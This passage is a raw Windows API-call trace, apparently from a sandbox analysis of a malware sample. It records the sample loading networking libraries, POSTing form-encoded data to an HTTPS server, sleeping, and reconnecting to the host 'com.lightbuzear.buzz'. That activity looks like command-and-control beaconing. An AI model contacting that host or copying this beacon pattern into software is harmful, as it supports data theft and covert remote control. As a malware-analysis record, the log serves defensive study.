hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f958 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f928 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f958 | out: hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0194.113] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f910 [0194.113] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0194.114] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f958 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9a0 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f958 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0194.114] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481f898 [0194.114] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815180 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815180 | out: hHeap=0x4780000) returned 1 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0194.115] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f9a0 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f808 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814fa0 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0194.115] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0194.115] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814fa0 | out: hHeap=0x4780000) returned 1 [0194.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814fa0 [0194.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0194.116] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815018 [0194.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0194.116] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0194.116] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0194.116] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815018 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f928 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f958 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f928 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f958 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48150e0 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0194.117] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48151a8 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0194.117] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815018 [0194.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0194.118] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0194.118] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0194.118] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0195.396] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815018 | out: hHeap=0x4780000) returned 1 [0195.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0195.396] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0195.397] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f868 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fa90 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f868 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4815018 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0195.397] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815018 | out: hHeap=0x4780000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815018 [0195.397] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb898 [0195.398] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e10 [0195.398] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0195.398] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0195.398] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0195.398] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e10 | out: hHeap=0x4780000) returned 1 [0195.399] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa90 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f9a0 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa90 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f9a0 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48150e0 [0195.399] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0195.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48150e0 | out: hHeap=0x4780000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e10 [0195.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0195.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815180 [0195.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0195.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0195.401] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0195.401] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0195.401] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815180 | out: hHeap=0x4780000) returned 1 [0195.407] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0195.407] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0195.408] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0195.408] FreeLibrary (hLibModule=0x71570000) returned 1 [0195.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0195.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0195.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0195.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0195.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0195.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815040 | out: hHeap=0x4780000) returned 1 [0195.409] Sleep (dwMilliseconds=0x2710) [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481fa30 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481fad8 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fa30 | out: hHeap=0x4780000) returned 1 [0195.429] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0195.429] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481fad8 | out: hHeap=0x4780000) returned 1 [0195.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fac0 [0195.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0195.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814ed8 | out: hHeap=0x4780000) returned 1 [0195.430] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0195.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815040 [0195.430] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0195.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0195.430] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f8b0 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f808 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f8b0 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4814e60 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0195.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814e60 | out: hHeap=0x4780000) returned 1 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48150e0 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0195.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0195.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0195.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0195.432] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0195.437] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0195.437] FreeLibrary (hLibModule=0x71780000) returned 1 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0195.438] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814e60 [0195.438] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f940 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x481f958 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f940 | out: hHeap=0x4780000) returned 1 [0195.438] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0195.438] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f958 | out: hHeap=0x4780000) returned 1 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x481fa30 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0195.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815158 | out: hHeap=0x4780000) returned 1 [0195.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4815158 [0195.439] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814ed8 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0195.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0195.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0195.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0195.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x481f808 [0195.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0195.440] RtlAllocateHeap 